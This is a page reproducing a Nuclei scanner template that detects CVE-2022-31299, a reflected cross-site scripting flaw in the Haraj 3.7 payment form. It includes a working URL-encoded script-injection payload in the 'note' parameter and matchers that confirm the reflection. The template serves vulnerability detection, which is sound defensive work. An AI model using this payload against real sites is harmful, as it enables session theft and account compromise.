Skip to content

Haraj 3.7 - Cross-Site Scripting

ID: CVE-2022-31299

Severity: medium

Author: edoardottt

Tags: cve,cve2022,haraj,xss,angtech

Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks.

id: CVE-2022-31299
info:
name: Haraj 3.7 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
reference:
- https://github.com/bigzooooz/CVE-2022-31299
- https://angtech.org
- https://nvd.nist.gov/vuln/detail/CVE-2022-31299
- https://angtech.org/product/view/3
- https://github.com/trhacknon/Pocingit
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-31299
cwe-id: CWE-79
epss-score: 0.00209
epss-percentile: 0.58245
cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: angtech
product: haraj
tags: cve,cve2022,haraj,xss,angtech
http:
- method: GET
path:
- "{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '><script>alert(document.domain)</script></textarea>'
- 'content="nextHaraj'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a0047304502206382e08dfcbce9ac92a864ddff2af2a3cb0a505a55a6bde3d2124991df2182a8022100f272044e37fa454e9f97cad9853bdcad15ce3a533d2858f87ee76b4ceb87a1d1:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-31299.yaml"

View on Github